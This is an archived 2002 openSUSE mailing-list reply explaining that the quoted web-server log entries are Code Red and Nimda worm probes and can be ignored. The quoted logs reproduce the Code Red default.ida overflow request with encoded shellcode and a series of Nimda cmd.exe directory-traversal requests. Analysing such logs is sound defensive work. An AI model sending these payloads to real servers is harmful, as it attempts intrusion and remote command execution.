Mailinglist Archive: opensuse (3644 mails)

< Previous Next >
Re: [SLE] web log
This is the Code Red / Nimda attack signatures. You can just ignore them
since you are not at risk. I know, they really clutter up the logs though.

I do not think there is a way to keep them out of the log, on the security list
they went around on this and I do not remember any specific resolution
which would keep them out of the log files. (anyone know of a way to
avoid logging these entries?)

Jim

03/12/02 05:19:04 PM, Landy Roman <landy@xxxxxxxxxxxxxxx> wrote:


i saw these entries in my weblog anything i can do against this



61.182.248.223 - - [12/Mar/2002:07:47:44 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331 64.133.27.115 - -
[12/Mar/2002:10:23:19
-0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115
- -
[12/Mar/2002:10:23:20 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 -
-
[12/Mar/2002:10:23:20 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500]
"GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500]
"GET
/_mem_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500]
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%
1c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - -
[12/Mar/2002:10:23:21 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401
476
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
202.5.152.215 - - [12/Mar/2002:12:01:15 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331 146.155.10.241 - -
[12/Mar/2002:12:50:04
-0500] "GET
/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331 212.205.99.248 - -
[12/Mar/2002:13:07:02
-0500] "GET
/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331

--
To unsubscribe send e-mail to suse-linux-e-unsubscribe@xxxxxxxx
For additional commands send e-mail to suse-linux-e-help@xxxxxxxx
Also check the FAQ at http://www.suse.com/support/faq and the
archives at http://lists.suse.com






< Previous Next >
References